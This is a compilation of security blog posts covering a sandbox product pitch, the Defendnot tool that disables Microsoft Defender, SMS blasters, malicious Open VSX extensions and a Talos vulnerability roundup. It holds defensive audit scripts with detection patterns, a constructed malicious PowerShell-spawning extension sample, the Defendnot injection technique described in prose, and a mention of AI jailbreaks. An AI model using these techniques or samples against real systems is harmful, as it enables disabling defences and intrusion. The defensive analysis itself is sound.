Key improvements after adopting the Enterprise plan: 

  • Faster triage and response: Analysts process alerts twice as fast using automated sandbox submissions and interactivity 
  • Smarter planning and decision-making: Deeper behavioral insights help the team prioritize threats more effectively 
  • Prevented major ransomware incident: A suspicious supplier email was detonated in the sandbox, revealing ransomware and saving the company from significant financial and reputational damage 

ANY.RUN became a central part of their modernized SOC, delivering speed, visibility, and control without increasing complexity. 

Privacy: Keep Investigations Secure and Under Control 

In threat investigations, privacy plays an important role. A single public task launched by mistake can expose sensitive data, damage trust, or break compliance. The Enterprise plan helps your team avoid those risks with flexible private analysis options, role-based visibility controls, and secure access through SSO. 

Flexible Private Analysis Quotas 

Enterprise customers can choose the model that fits their team structure best: 

  • Unlimited private analyses per user with a per-user pricing model 
  • Unlimited users with a per-analysis pricing model 

This flexibility makes sure your investigations stay private, without limiting your team’s ability to scale or collaborate. 

Granular Privacy Controls 

Manage privacy in your team settings

You can control each user’s access to the sandbox, including the default privacy level of their analyses: whether tasks are visible only to the user, shared with the team, or accessible via a link. Team masters can define what analysts are allowed to share and ensure sensitive investigations aren’t exposed by mistake. 

In large or distributed teams, one misconfigured setting can lead to accidental data leaks. Granular privacy controls help reduce that risk by enforcing visibility rules at the user level, keeping your analysis environment secure without slowing your team down. 

Let us show you how ANY.RUN can help your SOC team – book a call with us ⬇

Single Sign-On (SSO): Simpler Access, Stronger Control 

For busy security teams, managing multiple logins can slow things down, and increase risk. With Single Sign-On (SSO) in the Enterprise plan, your team can log in to ANY.RUN using the same credentials they use across the rest of your organization. 

That means: 

  • Fewer login issues and less time wasted on password resets 
  • Stronger access control, especially as your team grows 
  • Easier onboarding and offboarding for analysts and contractors 

SSO helps your SOC stay efficient and secure, giving every team member fast, reliable access to the sandbox, without extra friction. It also reduces the chance of human error, making it easier to stay compliant with internal policies and external standards. 

Automated Interactivity: Streamline Analysis for Faster Response

See a video recording of the analysis performed by Automated Interactivity

Automated Interactivity, powered by machine learning, enables security teams to automate file/URL analysis by letting the sandbox simulate human actions to outsmart evasion tactics like CAPTCHAs and redirects. Available exclusively in the Enterprise plan, it gives a massive boost to SOC efficiency by automating detonation of attacks and accelerating threat detection.

It identifies and detonates malicious content, such as email attachments, payloads inside archives, and URLs in QR codes. Thanks to this feature, your SOC team can reduce workload and improve the detection rate and alert processing capabilities while focusing on critical incidents only.

This sandbox has provided features we didn’t have previously and helps to make the team more efficient

Joel P., Enterprise (> 1000 emp.)

API/SDK: Integrate ANY.RUN for Faster SOC Workflows 

ANY.RUN app for IBM QRadar SOAR 

The Enterprise plan gives your team full access to API and SDK integrations, so you can embed ANY.RUN directly into your existing workflows, automate routine tasks, and enrich investigations with real-time behavioral data. 

Whether you use a SIEM, SOAR, or case management platform, ANY.RUN connects seamlessly, helping analysts cut down on manual effort and focus on what matters most. 

You can set up integration with other security vendors with ease

One of our latest integrations is with IBM QRadar SOAR, a popular platform for incident response. With ANY.RUN’s official app, teams can: 

  • Launch sandbox analyses directly from SOAR playbooks 
  • Enrich cases with fresh IOCs and behavioral insights 
  • Automate repetitive tasks to reduce Mean Time to Respond (MTTR) 

Setup takes minutes; just plug in your API key and get started. 

With integrations like this, ANY.RUN becomes a natural part of your security workflow, helping your team move faster, stay aligned, and act with greater precision. 

Teamwork: Smarter Collaboration for Analysts 

Even the most advanced tools fall short when teams can’t work together effectively. In many SOCs, analysts work in silos, communication breaks down, and duplicated work or missed alerts slow down investigations. 

Team management displayed inside ANY.RUN sandbox

The Teamwork feature in Enterprise makes collaboration seamless, whether your team sits in the same room or operates across time zones. Analysts can join a shared workspace, while team leads assign roles, track progress, and manage licenses, all from one central interface. 

  • Faster coordination across analysts, team leads, and managers 
  • Clear task ownership and role definitions to avoid confusion or rework 
  • Real-time supervision for team leads, without disrupting workflow 
  • Scalable team structure, ready to support fast-growing SOCs 

Track team members’ productivity

When every analyst knows what to focus on, and team leads can oversee without micromanaging, you reduce delays, avoid duplication, and build a stronger response process. 

ANY.RUN is used by companies of different sizes and across numerous industries

Other Enterprise-Grade Capabilities for Deeper, More Accurate Investigations 

The sandbox offers advanced threat analysis capabilities across Windows, Linux, and Android

The Enterprise plan gives your analysts the technical depth and flexibility to run more realistic, multi-stage investigations and uncover even the most evasive threats. 

  • Ensure full sandbox coverage without feature limitations: Enterprise users get access to 100% of sandbox functionality, unlocking every detection layer and configuration option available. 
  • Investigate advanced malware without time pressure: With a 1,200-second VM timeout, your team has the time needed to observe full execution chains, from initial dropper to final payload. 
  • Reveal location-based behavior and evasion techniques: Use residential proxy and locale selection to simulate real-world environments and detect malware that hides its behavior under generic settings. 
  • Analyze threats across real-world environments: Run samples in Windows (11 64-bit, 10 32-bit, and Windows 10 64-bit for Developers, exclusive to Enterprise), Linux, and Android to detect OS-specific behavior and expand coverage across your attack surface. 
  • Uncover stealthy or delayed malicious actions: Rely on system process monitoring and reboot support to catch techniques that only activate during system events or over time. 
  • Enable external reporting and automation with precision: Export results using JSON and MISP formats, making it easier to integrate analysis findings into your internal tools or client reporting. 
  • Support managed services and external collaboration: Work with confidence using a commercial license, built for MSSPs and enterprise security teams with external commitments. 

These capabilities make Enterprise more practical for real-world, high-stakes investigations that demand clarity, completeness, and context. 

Trusted by Industry Leaders and Backed by the Community 

ANY.RUN is consistently rated as a leading solution on major platforms. 

Gartner Peer Insights Rating for ANY.RUN  

From MSSPs to financial institutions, teams around the world choose ANY.RUN to investigate faster, detect smarter, and simplify their daily workflows. These ratings reflect what thousands of users already know: interactive analysis makes all the difference.

Boost SOC Performance with Real-Time Threat Intelligence 

Teams using ANY.RUN’s Interactive Sandbox also utilize advanced Threat Intelligence solutions that help you enrich your security, from detection to prevention. 

Threat Intelligence Lookup 

Threat Intelligence Lookup provides free access to fresh, live threat intelligence

Quickly assess suspicious IPs, domains, hashes, and URLs with real-time context from live sandbox detonations across 15,000 organizations. TI Lookup uses over 40 behavioral and static indicators to help SOC teams make faster decisions, reduce false positives, and respond to threats before they escalate, minimizing business risk and cutting investigation time. 

Explore Threat Intelligence Lookup 

Threat Intelligence Feeds 

ANY.RUN’s TI Feeds offer unique malicious IPs, domains, and URLs for proactive defense 

Receive continuously updated network indicators pulled from the latest malware samples analyzed in our sandbox. ANY.RUN’s TI Feeds help you proactively block threats and improve detection rules across your entire security stack. 

Explore Threat Intelligence Feeds 

About ANY.RUN 

Designed to accelerate threat detection and improve response times, ANY.RUN equips teams with interactive malware analysis capabilities and real-time threat intelligence. 

ANY.RUN’s cloud-based sandbox supports investigations across Windows, Linux, and Android environments. Combined with Threat Intelligence Lookup and Feeds, our solutions give security teams full behavioral visibility, context-rich IOCs, and automation-ready outputs, all with zero infrastructure overhead. 

Ready to see how ANY.RUN’s services can power your SOC?   

Start your 14-day trial now → 

The post Enterprise Plan: Boost SOC Performance, Reduce Business Risks with ANY.RUN appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Defendnot: fake antivirus software to disable Microsoft Defender

Many companies today operate a Bring Your Own Device (BYOD) policy, allowing employees to use their own devices for work purposes. This practice is especially prevalent in organizations that embrace remote working. BYOD brings many obvious advantages, but its implementation creates new risks for companies in terms of cybersecurity.

To protect systems from threats, information security departments often require that security software is installed on all devices used for work. At the same time, some employees – especially hotshot techies – may view antivirus software more as a hindrance than a help.

Not the most sensible attitude for sure, but convincing them otherwise can be hard. The main problem is that employees who believe they know better may find a way to dupe the system. Today, we investigate one such method: a new research tool known as Defendnot, which disables Microsoft Defender on Windows devices by registering fake antivirus software.

How no-defender blazed the trail using fake antivirus to disable Microsoft Defender

To understand exactly how Defendnot disables Microsoft Defender, we need to turn the clock back a year. Back then, a researcher with the X handle es3n1n created and published the first version of the tool on GitHub. Called no-defender, it was tasked with disabling the built-in Windows Defender antivirus.

To accomplish this task, es3n1n exploited a weakness in the Windows Security Center (WSC) API. Through it, antivirus software informs the system that it is installed and ready to start protecting the device in real time. Upon receiving such a message, Windows automatically disables Microsoft Defender to avoid conflicts between different security solutions all running on the same device.

Using the code of an existing security solution, the researcher created their own fake antivirus that registered in the system and passed all Windows checks. Once Microsoft Defender was disabled, the device was left unprotected – since no-defender offered no protection of its own.

The no-defender project quickly drew a following on GitHub, where it was starred over two thousand times. However, the antivirus developer company whose code was reused filed a complaint for violation of the Digital Millennium Copyright Act (DMCA). So es3n1n was forced to remove the project code from GitHub, leaving only a description page.

How Defendnot succeeded no-defender

But the story doesn’t end there. Almost a year later, New Zealand programmer MrBruh prompted es3n1n into developing a version of no-defender that didn’t rely on third-party code. Piqued by the challenge, and short on sleep, es3n1n wrote a new tool in four days flat, which was dubbed Defendnot.

At the heart of Defendnot is a stub DLL posing as a legitimate antivirus. To get past the WSC API’s checks – Protected Process Light (PPL), digital signatures and other mechanisms – Defendnot injects its DLL into Taskmgr.exe, a Microsoft-signed process that Windows already trusts. From inside that process the tool registers the fake antivirus, and Microsoft Defender immediately turns itself off, leaving the device without active protection.

On top of that, Defendnot allows the user to assign any name to the “antivirus”. Similarly to its predecessor, this project became a hit on GitHub, having been starred 2100 times at the time of writing. To install Defendnot, the user must have administrator rights (which employees most likely have on personal devices).
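A practical consequence of the mechanism above is that the list of antivirus products registered in Windows Security Center should be audited rather than trusted. The following script is an added example, not Defendnot's code and not a Kaspersky tool: it parses the JSON that PowerShell emits for `Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | ConvertTo-Json`, decodes the widely used (but officially undocumented) productState bit layout, and flags products that are not on the organisation's approved list, run from an unexpected path, or have displaced Defender. The sample records, the "Corp EDR" approved product and the fake product name are constructed for the demo.

```python
"""Audit the antivirus products registered in Windows Security Center (WSC).

Added illustration, not Defendnot's code or a Kaspersky tool. Input is the JSON
that PowerShell produces for
  Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | ConvertTo-Json
The productState decoding below is the community-documented layout (Microsoft
does not publish it). Records, approved products and names are constructed.
"""
import json

# Constructed sample: Defender reports itself disabled (0x060100) while a product
# registered from a user profile directory claims real-time protection (0x041000).
SAMPLE_WSC_JSON = r"""[
  {"displayName": "Windows Defender",
   "pathToSignedProductExe": "windowsdefender://",
   "pathToSignedReportingExe": "%ProgramFiles%\\Windows Defender\\MsMpeng.exe",
   "productState": 393472},
  {"displayName": "Totally Legit AV",
   "pathToSignedProductExe": "C:\\Users\\dev\\defendnot\\fake.exe",
   "pathToSignedReportingExe": "C:\\Users\\dev\\defendnot\\fake.exe",
   "productState": 266240}
]"""

# Hypothetical corporate allowlist: display name -> path prefix its binary must live under.
APPROVED = {"Corp EDR": "C:\\Program Files\\CorpEDR\\"}

# Locations a genuine product installer writes to; anything else deserves a look.
TRUSTED_PATH_PREFIXES = ("windowsdefender://", "%ProgramFiles%\\",
                         "C:\\Program Files\\", "C:\\Program Files (x86)\\")


def decode_product_state(state):
    """Community decoding of AntiVirusProduct.productState: bits 12-15 hold the
    on/off flag (1 = real-time protection on), bits 4-7 the signature state
    (1 = definitions out of date)."""
    return {"enabled": (state >> 12) & 0xF == 1,
            "out_of_date": (state >> 4) & 0xF == 1}


def audit_wsc(records, approved):
    """Return a list of findings (strings) for AntiVirusProduct records."""
    findings = []
    defender_enabled = False
    other_enabled = []
    trusted = tuple(p.lower() for p in TRUSTED_PATH_PREFIXES)
    for rec in records:
        name = rec.get("displayName", "") or ""
        path = rec.get("pathToSignedProductExe", "") or ""
        state = decode_product_state(int(rec.get("productState", 0)))
        if name == "Windows Defender":
            defender_enabled = state["enabled"]
            continue
        if state["enabled"]:
            other_enabled.append(name)
        expected_prefix = approved.get(name)
        if expected_prefix is None:
            findings.append("unapproved product registered in WSC: %r (%s)" % (name, path))
        elif not path.lower().startswith(expected_prefix.lower()):
            findings.append("approved name %r but unexpected executable path: %s" % (name, path))
        if not path.lower().startswith(trusted):
            findings.append("product %r registered from outside standard program directories: %s"
                            % (name, path))
    if not defender_enabled and other_enabled and not any(n in approved for n in other_enabled):
        findings.append("Microsoft Defender is off and only unapproved products claim to protect "
                        "the host: %s" % ", ".join(other_enabled))
    return findings


def audit_wsc_json(text, approved):
    """Parse ConvertTo-Json output (a bare object when there is one record) and audit it."""
    data = json.loads(text)
    if isinstance(data, dict):
        data = [data]
    return audit_wsc(data, approved)


if __name__ == "__main__":
    for finding in audit_wsc_json(SAMPLE_WSC_JSON, APPROVED):
        print("FINDING:", finding)
```

Run it against the real WSC output on a BYOD endpoint and treat any finding as a reason to pull the device out of the trusted group; also cross-check with `Get-MpComputerStatus`, since Defender's own view of its real-time protection state and the WSC registration list should agree.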

How to protect corporate infrastructure from BYOD misuse

Defendnot and no-defender are positioned as research projects, with both tools demonstrating how trusted system mechanisms can be manipulated to disable protective functions. The conclusion is obvious: you can’t always trust what Windows says.

Therefore, so as not to endanger your company’s digital infrastructure, we recommend beefing up its BYOD policy with a number of additional security measures:

  • Where possible, make it mandatory for BYOD device owners to install reliable corporate protection administered by the company’s information security team.
  • If this is not possible, do not consider BYOD devices as trusted simply for having antivirus software installed, and limit their access to corporate systems.
  • Strictly control access permissions to ensure they correspond to employees’ job responsibilities.
  • Pay special attention to BYOD device activity in corporate systems, and deploy an XDR solution to monitor behavioral anomalies.
  • Train employees in the basics of cybersecurity so that they understand how antivirus software works, and why they shouldn’t try to disable it. To help with this, our Kaspersky Automated Security Awareness Platform delivers all you need and more.

Kaspersky official blog – ​Read More

What an SMS blaster is, and how to protect yourself from malicious SMS messages while traveling | Kaspersky official blog

Fake text messages pretending to be from banks, delivery services, or municipal agencies are scammers’ tactic of choice to trick people into revealing financial information and passwords. This type of phishing is often referred to as “smishing” (from “SMS phishing”). While nearly every carrier filters dangerous text messages, and only a fraction reach recipients, scammers have come up with something new. Over the past year, criminals have been arrested in the UK, Thailand, and New Zealand for sending messages that bypassed carrier networks and went directly to victims’ phones. This technology is known as “SMS blasting”.

What is an SMS blaster?

An SMS blaster pretends to be a cellular base station. About the size of an old computer tower, it bristles with antennas. Scammers often stash it in the trunk of a car or even in a backpack. Once activated, the blaster prompts all nearby phones to connect to it, as it appears to be the most powerful base station with the best signal. When a phone connects, it receives a fake SMS. Depending on the blaster model and reception conditions, the SMS broadcast range is between around 500 and 2000 meters.

This is why criminals prefer to operate in crowded areas like shopping malls, or tourist and business centers: these are where all known attacks have been recorded. What’s more, the tech the scammers use provides them with all sorts of tricks: they don’t pay for the messages, they can spoof any sender, and they’re free to include any links at all; they don’t even need to know victims’ phone numbers: any phone will receive a message if it connects to the fake cell tower.

How an SMS blaster works

An SMS blaster exploits weaknesses in the 2G (GSM) communication standard. While 2G is primarily used today in remote, sparsely populated areas, virtually all phones still support it. First, the blaster sends a technical signal over modern 4G/5G networks. When any phone or smartphone receives this signal, it attempts to switch to a 2G network. Simultaneously, the blaster broadcasts fake 2G base-station signals. The victim’s smartphone recognizes these as legitimate carrier signals and connects.

In 3G, 4G and 5G the phone and the network authenticate each other cryptographically when a connection is set up. GSM only authenticates the phone to the network: the phone has no way to verify that the base station is genuine, and even encryption of the link is optional. This loophole allows an SMS blaster to mimic any carrier. Once connected, it can send any text message to a smartphone. After transmitting the SMS, the fake base station disconnects, and the smartphone reverts to its normal 4G/5G network with its legitimate carrier.

Perhaps surprisingly, this technology isn’t new. Similar to blasters, devices known as IMSI catchers, StingRays, or cell site simulators, have been used by law enforcement and intelligence agencies to gather data on individuals attending events of interest. However, criminals have found a new use for the technology.

Defending against SMS blasters

You can block fake text messages by disabling 2G network connectivity on your smartphone, but that’s a double-edged sword. If you live in an area with poor signal or far from major cities, your phone might still occasionally use 2G. This is why many carriers haven’t completely phased out the outdated technology.

If you haven’t seen the 2G icon (an “E” or “G” next to your signal-strength indicator) in years, you might want to consider this option. Android phones running version 12 or newer offer the ability to disable 2G, but not every vendor makes this toggle visible and accessible. Android 16 introduced notifications that alert you if your smartphone might be connected to a fake 2G tower, but due to hardware limitations these only work on certain newer smartphones.

There’s no similar option in iOS, but you can effectively disable 2G by activating Lockdown Mode. Unfortunately, this does far more than just turn off 2G; it significantly restricts many iPhone functions in the name of maximum security (many would say it renders an iPhone practically unusable).

To avoid sacrificing your phone’s functionality while still protecting yourself from dangerous text messages, consider using a comprehensive smartphone security system. SMS blasts will still be delivered to your phone, but they won’t cause harm thanks to two layers of protection. The system identifies malicious messages regardless of the cellular network and blocks SMS spam (only on Android devices), while phishing protection prevents you from navigating to dangerous websites (on all smartphones).

Beyond technical measures, vigilance and general precautions are crucial in combating fake text messages. Instead of tapping links, sign in to your banking app or delivery service website directly from your bookmarks, your smartphone’s home screen, or by manually typing the address into your browser.

What other tricks do scammers use to try and sneak into your smartphone?

Kaspersky official blog – ​Read More

Patch, track, repeat

Welcome to this week’s edition of the Threat Source newsletter.

We’ve made it halfway through 2025 already! It’s been a while since I last wrote about CVEs and how free support for Windows 10 will end on October 14, 2025, leaving you with no more security fixes.

While the CVE system remains the global standard for vulnerability reporting, recent developments have sparked concerns within the community about its long-term stability. Currently, the program operates solely as a U.S. government-funded initiative. Following the last-minute funding extension, we’re now seeing competing ideas and projects emerging. Whether it’s the CVE Foundation working to transition from a single funding stream to a diversified and stable model, ENISA’s EUVD, or the Global CVE Allocation System (GCVE), the landscape is changing.

On one hand, a multi-source environment enhances availability and resilience. On the other, this fragmentation raises practical concerns for both researchers and practitioners. We now face questions like “Where should I report a vulnerability?” and “How do I integrate and correlate vulnerability data across multiple sources with multiple identifiers?”

Looking back at the first six months of this year, we see that the rapid pace of CVE publications in 2024 has continued into 2025, with no signs of slowing down. In fact, the current trend suggests that 2025 will surpass last year’s total of a little more than 40,000 CVEs. To illustrate: the first half of 2024 saw an average of 113 CVEs published per day, whereas the first half of 2025 is running at a rate of 131 CVEs per day.

What concerns me even more is the steep increase in Known Exploited Vulnerabilities (KEVs). It wasn’t just the spike in March — we’re seeing a generally sharper rise overall.

Vendor diversity also continues to expand, increasing from 45 vendors during the first half of last year to 61 so far this year. Additionally, the proportion of KEVs affecting network-related gear has grown from 22.5% in 2024 to 25% in 2025.

But there’s a small piece of good news: So far, I haven’t seen any CVEs from as far back as 2012 being added to the KEV catalogue like we saw last year. This time, the oldest additions “only” go back to 2017.

Keep in mind that the CVE year merely indicates when a vulnerability was reserved or assigned. The vulnerability itself may have existed for many years prior. For example, the recent sudo/chroot issue remained undiscovered for over 12 years. 

In a nutshell: Keep tracking, keep patching. Vulnerabilities certainly won’t patch themselves.

The one big thing 

Microsoft’s July 2025 security update addresses 132 vulnerabilities, including 14 marked as “critical,” with several remote code execution (RCE) issues affecting Windows, Office, SharePoint and Hyper-V. Although none have been exploited in the wild yet, some vulnerabilities — like those in SharePoint and SPNEGO NEGOEX — are more likely to be targeted and could allow attackers to execute code remotely or locally.

Why do I care? 

These vulnerabilities could let attackers take control of your systems, steal information or disrupt business operations, even if you haven’t seen any attacks yet. If you’re running Windows servers, SharePoint or Microsoft Office, your environment could be at risk, especially for organizations that rely on these products daily.

So now what? 

Don’t wait. Make sure you’re applying Microsoft’s July patches as soon as possible. If you use Cisco Secure Firewall or SNORT®, update your rulesets to the latest versions to maximize your protection.

Top security headlines of the week 

Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage
A Chinese national was arrested in Milan, Italy for allegedly being linked to the state-sponsored Silk Typhoon hacking group, which is responsible for cyberattacks against U.S. organizations and government agencies. (Bleeping Computer)

Jailbreaking AI with information overload 
Researchers say you can trick AI chatbots like ChatGPT or Gemini into teaching you how to make a bomb or hack an ATM if you make the question complicated, full of academic jargon, and cite sources that do not exist. (404 Media)

SatanLock is shutting down
The announcement that the group was closing its doors first came through its official Telegram channel and dark web leak site. Hunters International, another well-known ransomware group, also recently announced that it was shutting down its operations. (Dark Reading)

Ingram Micro scrambling to restore systems after ransomware attack
The IT distributor giant confirmed over the weekend that a ransomware attack was responsible for a widespread outage of its services, and that it was forced to take certain systems offline on Friday afternoon in response to the incident. (SecurityWeek)

Malicious Chrome extensions with 1.7M installs found on Web Store
Malicious extensions with 1.7 million downloads in Google’s Chrome Web Store pose as legitimate tools but could track users, steal browser activity, and redirect to potentially unsafe web addresses. (Bleeping Computer)

Can’t get enough Talos? 

Scams, jailbreaks and poetic justice
In this episode of the TTP, Hazel Burton sits down with Talos’ Jaeson Schultz to explore the underground world of criminal LLM abuse, from elaborate scams to role-playing jailbreak prompts designed to trick AI into ignoring its own rules.

Vulnerability Roundup
Cisco Talos’ Vulnerability Discovery & Research team has disclosed and coordinated patches for two vulnerabilities each in Asus Armoury Crate and Adobe Acrobat.

PDFs: Portable documents, or perfect deliveries for phish? 
A popular social engineering technique returns: callback phishing, or TOAD attacks, which leverage PDFs, VoIP anonymity and even QR code tricks.

Beers with Talos: Terms and conceptions may apply 
In this episode, the crew reassembles after a totally intentional and not-at-all accidental hiatus. They cover AI-assisted IVF, a possible underground war against dairy, and the real heroes: conference dogs.

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376 
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details 
Typical Filename: IMG001.exe 
Detection Name: Simple_Custom_Detection   

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Typical Filename: VID001.exe 
Claimed Product: N/A 
Detection Name: Win.Worm.Coinminer::1201 

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
MD5: 71fea034b422e4a17ebb06022532fdde  
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details 
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Coinminer:MBT.26mw.in14.Talos

Cisco Talos Blog – ​Read More

How extensions from Open VSX were used to steal cryptocurrency

Our researchers have uncovered several malicious fake extensions targeting Solidity developers in the Open VSX marketplace. At least one company has fallen victim to the attackers distributing these extensions — losing approximately US$500 000 in crypto assets.

Threats associated with malware distribution in open-source repositories have been known about for a long time. Despite this, users of AI-powered code editors like Cursor AI and Windsurf are forced to use the open-source extension marketplace Open VSX, as they have no other source for the extensions these platforms need.

However, extensions on Open VSX do not undergo the same rigorous checks as those on the Visual Studio Marketplace. This loophole allows attackers to distribute malicious software disguised as legitimate solutions. In this post, we dive into the details of the malicious Open VSX extensions investigated by our experts, and explain how to prevent similar incidents within your organization.

Risks for users of Open VSX extensions

In June 2025, a blockchain developer who had just lost approximately US$500 000 in crypto assets to attackers reached out to our experts and requested an incident investigation. While examining a disk image from the compromised system, our researchers noticed a suspicious component of an extension named Solidity Language for the Cursor AI development environment. The component was executing a PowerShell script, a red flag for an editor extension that is supposed to do nothing but syntax support.

The Solidity Language extension on the Open VSX marketplace

The description of the Solidity Language extension published on the Open VSX marketplace

The extension was installed from the Open VSX marketplace, where it had tens of thousands of downloads (presumably inflated by bot activity). The description claimed to optimize development of smart contract code written in the Solidity language. However, analysis of the extension revealed it had no useful functionality whatsoever. The developers who installed it mistook the lack of advertised features for a bug, didn’t immediately investigate, and just continued their work.

The extension wasn’t actually faulty; it was fake. Once installed, it contacted a command-and-control server to download and run a malicious script. This script then installed ScreenConnect — a remote access application — on the victim’s computer.

The attackers used ScreenConnect to upload additional malicious payloads. In the incident our experts investigated, these tools specifically allowed the attackers to steal passphrases for the developer’s crypto wallets and then syphon off cryptocurrency. A detailed technical description of the attack, along with indicators of compromise, is available in a Securelist blog post.

Manipulating search: how attackers promote malicious extensions

A look into the Open VSX marketplace revealed a concerning trend: a fake extension, deceptively named “Solidity Language”, ranked fourth in search results, while the legitimate extension, simply called solidity, appeared all the way down at eighth. It’s no surprise then that the developer downloaded the counterfeit instead of the genuine article.

Search results for “solidity”: the malicious extension (red) vs. the legitimate one (green)

This ranking is quite surprising, especially considering that at the time of the search, the legitimate extension had more downloads: 61 000 compared to the fake’s 54 000.

The key lies in Open VSX’s ranking algorithm. It doesn’t solely rely on download counts to determine relevance; it also considers other factors like verification status, ratings, and recency. This is exactly how the attackers managed to outrank the genuine extension in search results: the fake one had a more recent update date.

The fake plugin was removed from the Open VSX marketplace on July 2, 2025, right after the cryptocurrency heist. However, the very next day, we found another malicious package with the same name as the original extension, “solidity”, and the same harmful functionality as Solidity Language.

Additionally, our researchers used an open-source component-monitoring tool to discover yet another malicious package in Open VSX. Several details link this package to the same cybercriminals.

Why do developers have to rely on the Open VSX marketplace?

The Visual Studio Marketplace, Microsoft’s official store, has long been the primary industry source for extensions. It includes automatic scanning for malicious code, sandboxed execution of extensions for behavioral analysis, monitoring for anomalies in extension usage, and a number of other features to help identify harmful extensions. However, its licensing agreement dictates that only solutions for use with Visual Studio products can be published in the Visual Studio Marketplace.

Consequently, users of increasingly popular AI-powered code editors like Cursor AI and Windsurf must install extensions from an alternative store: Open VSX. The problem is that this platform has less stringent extension vetting, which makes it easier to distribute malicious packages compared to Microsoft’s official marketplace.

To be fair, attackers sometimes manage to publish malicious extensions even in the more secure Visual Studio Marketplace. For instance, this spring, experts found three malicious extensions there with an infection scheme very similar to the one described in this post, also targeting Solidity developers.

How to stay safe?

No matter where you’re installing extensions from, we recommend the following:

  • Be careful when searching marketplaces.
  • Always take note of who the developer of an extension is.
  • Check the code and behavior of extensions you install.
  • Use an XDR solution to monitor any suspicious activity inside the corporate network.
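One way to act on the third recommendation, checking what an extension actually does before trusting it, is a small static audit of its manifest and JavaScript. The code below is an added example, not Kaspersky's tooling or part of the original post; the indicator names are our own, and the sample manifests and sources are constructed to mirror the incident described above (an extension that contributes nothing to the editor, activates unconditionally, and spawns PowerShell).

```python
import re

# Heuristics a reviewer can run over an editor extension before trusting it.
# These indicator names are this example's own, not Open VSX's.
RISKY_PATTERNS = {
    "spawns a child process": re.compile(r"child_process|\bexec(Sync)?\(|\bspawn\("),
    "invokes PowerShell": re.compile(r"\bpowershell(\.exe)?\b", re.IGNORECASE),
    "fetches a script or binary at runtime": re.compile(
        r"https?://[^\s\"']+\.(ps1|exe|dll|msi)\b", re.IGNORECASE),
    "evaluates code from a string": re.compile(r"\beval\(|new Function\("),
}


def audit_extension(manifest, sources):
    """Return a list of findings for one extension.

    manifest: the parsed package.json of the extension.
    sources:  mapping of relative path -> contents of its JavaScript files.
    """
    findings = []
    # A "language support" extension that contributes nothing (no language,
    # grammar or command) offers the editor nothing, as the fake one did.
    if not manifest.get("contributes"):
        findings.append("manifest contributes no languages, grammars or commands")
    # Activating on '*' runs the extension as soon as the editor starts,
    # even if the user never opens a Solidity file.
    if "*" in manifest.get("activationEvents", []):
        findings.append("activates unconditionally on editor start")
    for path, code in sources.items():
        for label, pattern in RISKY_PATTERNS.items():
            if pattern.search(code):
                findings.append(f"{path}: {label}")
    return findings


# Constructed sample inputs modelled on the incident (not the real files).
FAKE_MANIFEST = {"name": "solidity-language", "activationEvents": ["*"],
                 "main": "./extension.js"}
FAKE_SOURCES = {"extension.js": (
    'const cp = require("child_process");\n'
    'cp.exec("powershell -File stage.ps1");\n')}
LEGIT_MANIFEST = {"name": "solidity", "activationEvents": ["onLanguage:solidity"],
                  "contributes": {"languages": [{"id": "solidity"}]}}
LEGIT_SOURCES = {"extension.js": "exports.activate = () => registerProvider();\n"}

if __name__ == "__main__":
    for name, m, s in (("fake", FAKE_MANIFEST, FAKE_SOURCES),
                       ("legit", LEGIT_MANIFEST, LEGIT_SOURCES)):
        print(name, audit_extension(m, s) or ["no findings"])
```

A hit on any of these indicators is a reason to read the extension's code in full, not proof of malice; plenty of legitimate extensions spawn a language server.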

Kaspersky official blog

Asus and Adobe vulnerabilities

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed two vulnerabilities each in Asus Armoury Crate and Adobe Acrobat products.

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Asus Armoury Crate stack-based buffer overflow and authorization bypass vulnerabilities

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

These vulnerabilities were recently covered in a deep-dive post, Decrement by one to rule them all.

Asus Armoury Crate is a software utility used to manage Asus and ROG lighting, performance, and updates.

TALOS-2025-2144 (CVE-2025-1533) is a stack-based buffer overflow vulnerability in the AsIO3.sys kernel driver of Asus Armoury Crate 5.9.13.0. A specially crafted I/O request packet (IRP) can lead to stack-based buffer overflow. An unprivileged attacker can run a program from user mode to trigger this vulnerability.

TALOS-2025-2150 (CVE-2025-3464) is an authorization bypass vulnerability in the AsIO3.sys functionality of Asus Armoury Crate 5.9.13.0. A specially crafted hard link can lead to an authorization bypass. An attacker can create a hard link to trigger this vulnerability.

Adobe Acrobat Reader out-of-bounds read and use-after-free vulnerabilities

Discovered by Kamlapati Choubey of Cisco Talos.

Adobe Acrobat Reader is one of the most popular PDF readers currently available. Talos found an out-of-bounds read vulnerability, TALOS-2025-2159 (CVE-2025-43578), in the Font functionality of Adobe Acrobat Reader 2025.001.20435. A specially crafted font file embedded into a PDF can trigger this vulnerability, which can lead to disclosure of sensitive information.

TALOS-2025-2170 (CVE-2025-43576) is a use-after-free vulnerability in the annotation object processing functionality of Adobe Acrobat Reader 2025.001.20435. Specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution.

An attacker needs to trick the user into opening the malicious file to trigger either of these vulnerabilities.

